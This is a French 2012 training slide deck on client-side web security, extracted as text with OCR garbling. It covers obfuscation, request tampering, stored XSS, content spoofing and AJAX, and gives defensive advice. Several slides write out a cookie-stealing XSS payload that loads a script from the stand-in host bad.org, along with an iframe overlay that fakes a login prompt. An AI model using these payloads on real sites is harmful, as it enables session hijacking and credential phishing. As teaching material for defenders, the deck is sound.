Sécurité web client. Magali Contensin. ANF Dev Web ASR Carry-Le-Rouet. 25 octobre 2012

Dimension: px

Commencer à balayer dès la page:

Download "Sécurité web client. Magali Contensin. ANF Dev Web ASR Carry-Le-Rouet. 25 octobre 2012"

Amélie Larrivée
il y a 8 ans
Total affichages :

1 web client Magali Contensin 25 octobre 2012 ANF Dev Web ASR Carry-Le-Rouet

2 Plan Visibilité du code La vérification des données côté client est insuffisante XSS Usurpation de contenu AJAX

3 Visibilité du code Code chargé et exécuté sur le client => visible pour tout internaute Obscurcissement obfuscation func0on pair(){ nb = prompt('entrez un nombre', ''); (nb%2 == 0)? alert('pair') : alert('impair'); } reverse engineering var _0x6d8d=["\x65\x6E\x74\x72\x65\x7A\x20\x75\x6E\x20\x6E\x6F\x6D \x62\x72\x65","","\x70\x61\x69\x72","\x69\x6d\x70\x61\x69\x72"];func0on pair(){nb=prompt(_0x6d8d[0],_0x6d8d[1]);(nb%2==0)?alert(_0x6d8d[2]):alert(_0x6d8d[3]);} ;

$_0x6d8d=["\x65\x6E\x74\x72\x65\x7A\x20\x75\x6E\x20\x6E\x6F\x6D$

4 Plan Visibilité du code La vérification des données côté client est insuffisante XSS Usurpation de contenu AJAX

5 La vérifica6on des données côté client est insuffisante JavaScript désactivé

6 La vérifica6on des données côté client est insuffisante Altération manuelle de la requête HTTP hxp://sites.fr/reserva0on.php?id=2 client altération URL variables dans la query string serveur altération formulaire (enregistrer, modifier) variables dans le corps POST /reservation.php?id=2 HTTP/1.1 Host: sites.fr Cookie: lang=fr;id=214535e1fa User-Agent: Firefox Content-Type: application/x-www-form-urlencoded Content-Length: 11 lieu=venise

id=2 client altération URL variables dans la query string serveur altération formulaire (enregistrer,

7 La vérifica6on des données côté client est insuffisante Outils pour manipuler les données de la requête client plugin (tamperdata, tamperie) proxy (webscarab) serveur en-tête corps en-tête corps POST /reservation.php?id=2 HTTP/1.1 Host: sites.fr Cookie: lang=fr;id=214535e1fa User-Agent: Firefox Content-Type: application/x-www- Content-Length: 11 lieu=venise client telnet 80 Requête forgée Altération variables en-tête & corps valeurs champs en-tête

8 La vérifica6on des données côté client est insuffisante 8 Tamper Data (Firefox) : intercepter, modifier et rejouer une requête HTTP 1 2

9 La vérifica6on des données côté client est insuffisante 9 Tamper Data données En-tête HTTP

10 La vérifica6on des données côté client est insuffisante 10 Tamper Data 1 2 3

11 La vérifica6on des données côté client est insuffisante 11 Tamper Data Menu d injection XSS Encodage

12 La vérifica6on des données côté client est insuffisante => vérifier les données côté serveur type présence de toutes les données attendues bornes taille liste de valeurs (select, radio, checkbox)

13 Plan Visibilité du code La vérification des données côté client est insuffisante XSS Usurpation de contenu AJAX

14 XSS Open Web Application Security Project Les 10 risques les plus cri0ques des applica0ons web (19/04/2010) Exécution de code malveillant dans le navigateur Envoi de contenu actif au client Contenu exécuté par le client But vol de session document.cookie défiguration hameçonnage (phishing) document.location

navigateur Envoi de contenu actif au client Contenu exécuté par le client

15 XSS exemple simple nom mail Smith serveur Inscrip0on OK Nom : Smith

16 XSS exemple simple nom mail Smith<script>alert(document.cookie)</script> serveur Inscrip0on OK Nom : Smith

17 XSS a?aque stockée XSS envoyé par le pirate XSS Applica0on web Smith <script src= </script> XSS SGBD nom mail Smith<script src=

Applica0on web Smith <script src=http://bad.

18 XSS a?aque stockée l accès à la ressource provoque l envoi du XSS administrateur 1 GET liste_inscrits.php XSS Applica0on web Smith <script src= Smith <script src= </script> 2 XSS SGBD

19 bad.org Sécurité XSS a?aque stockée exécu0on du XSS administrateur 1 GET liste_inscrits.php 3 XSS Applica0on web Smith <script src= Smith <script src= </script> 2 XSS SGBD GET

20 bad.org Sécurité XSS a?aque stockée exécu0on du XSS administrateur 1 GET liste_inscrits.php 3 XSS Applica0on web Smith <script src= Smith <script src= </script> 2 XSS SGBD GET document.write( <img src= +document.cookie+ width=1> ) 4 c.js

php 3 XSS Applica0on web Smith <script src=http://bad.org/c.

21 bad.org Sécurité XSS a?aque stockée le jeton de session est envoyé administrateur 1 GET liste_inscrits.php 3 5 XSS Applica0on web Smith <script src= Smith <script src= </script> 2 XSS SGBD GET document.write('<img src= width=1>') 4 GET c.js

22 bad.org Sécurité XSS a?aque stockée exploita0on des informa0ons de session administrateur 1 GET liste_inscrits.php 3 5 XSS Applica0on web Smith <script src= vol de session idsess=a2345effb9ccd78 6 Smith <script src= </script> 2 XSS SGBD GET document.write('<img src= width=1>') 4 GET c.js

23 XSS protec6on Développeur deux règles de protection contre le XSS filtrer les entrées (listes blanches) protéger les sorties définir le jeu de caractères de la page web coder les entités html Smith <script src=hxp://bad.org/c.js></script> protéger le jeton de session avec le flag httponly Attention à la fausse sensation de sécurité (attaques XST : requête HTTP TRACE) Utilisateur

24 Plan Visibilité du code La vérification des données côté client est insuffisante XSS Usurpation de contenu AJAX

25 Usurpa6on de contenu Modifier le contenu original de la page web But défiguration hameçonnage

26 Usurpa6on de contenu Smith <iframe src=...></iframe> Content spoofing Applica0on web C.S. SGBD nom mail Smith<iframe src= style="background-color:white;border:0;width: 100%;height:100%;position:absolute;top:0;left:0"></ iframe>

27 Usurpa6on de contenu admin. 1 GET liste_inscrits.php Smith <iframe src=...></iframe> Applica0on web C.S. SGBD

28 Usurpa6on de contenu admin. 1 GET liste_inscrits.php Smith <iframe src=...></iframe> Applica0on web C.S. SGBD C.S. 2 Contensin Dupond Smith<iframe src= style="backgroundcolor:white;border:0;width:100%;height:100%;position:absolute;top:0;left:0"></ iframe> Toto

29 bad.org Sécurité Usurpa6on de contenu admin. 1 GET liste_inscrits.php Smith <iframe src=...></iframe> Contensin Dupond Smith Toto C.S. 2 3 GET Applica0on web C.S. SGBD Contensin Dupond Smith<iframe src= style="backgroundcolor:white;border:0;width:100%;height:100%;position:absolute;top:0;left:0"></ iframe> Toto

30 bad.org Sécurité Usurpa6on de contenu admin. 1 GET liste_inscrits.php Smith <iframe src=...></iframe> Contensin Dupond Smith Toto C.S. 2 3 GET Applica0on web C.S. SGBD Contensin Dupond Smith<iframe src= style="backgroundcolor:white;border:0;width:100%;height:100%;position:absolute;top:0;left:0"></ iframe> Toto Vous avez été déconnecté, merci de vous authentifier login password 4

31 bad.org Sécurité Usurpa6on de contenu admin. 1 GET liste_inscrits.php Smith <iframe src=...></iframe> Vous avez été déconnecté, merci Contensin de vous authentifier Dupond login Smith password Toto C.S. 2 3 GET Applica0on web C.S. SGBD Contensin Dupond Smith<iframe src= style="backgroundcolor:white;border:0;width:100%;height:100%;position:absolute;top:0;left:0"></ iframe> Toto 4

32 bad.org Sécurité Usurpa6on de contenu admin. 1 GET liste_inscrits.php Smith <iframe src=...></iframe> Vous avez été déconnecté, merci de vous authentifier login password Applica0on web C.S. 2 C.S. SGBD Contensin Dupond Smith<iframe src= style="backgroundcolor:white;border:0;width:100%;height:100%;position:absolute;top:0;left:0"></ iframe> Toto 3 GET 4

33 bad.org Sécurité Usurpa6on de contenu admin. 1 GET liste_inscrits.php Smith <iframe src=...></iframe> Vous avez été déconnecté, merci de vous authentifier login password admin ******** Applica0on web C.S. 2 C.S. SGBD Contensin Dupond Smith<iframe src= style="backgroundcolor:white;border:0;width:100%;height:100%;position:absolute;top:0;left:0"></ iframe> Toto 5 3 GET 4

34 Usurpa6on de contenu Protection contre l usurpation de contenu Filtrer les entrées (listes blanches) Protéger les sorties n Définir le jeu de caractères de la page web n Coder les entités HTML Smith <iframe >

35 Plan Visibilité du code La vérification des données côté client est insuffisante XSS Usurpation de contenu AJAX

36 AJAX Mêmes problèmes de sécurité qu une application web standard Problèmes supplémentaires Surface d attaque plus étendue (nombre de points d entrées) Communication bi-directionnelle (entrées côté serveur et client) Code JavaScript lisible par tout client Injections : DOM JSON JavaScript (XSS)

37 bonnes pra6ques AJAX Sécuriser les communications (https si confidentialité) Vérifier l authentification et les privilèges dans tout script appelé par une requête XMLHTTP Filtrer les entrées listes blanches faire les vérifications dans le script final et dans les scripts appelés par les requêtes XMLHTTP vérifier les données retournées par le serveur avant de les utiliser sur le client (Injection DOM, XSS, JSON) Protéger les sorties Ne jamais faire de modification de données sur le serveur sans demander l autorisation à l utilisateur Attention au déni de service (cas des suggestions) Utiliser innertext plutôt que innerhtml pour du texte simple Attention aux scripts disponibles sur internet, leur préférer un framework AJAX utilisé par une large communauté

38 Liens OWASP (Open Web Application Security Project) CWE / SANS Top 25 Most Dangerous Software Errors

39 JavaScript Ques0ons?

Documents pareils

Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement

Guillaume HARRY l Contenu sous licence Creative Commons CC-BY-NC-ND Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement P. 2 1. Introduction 2.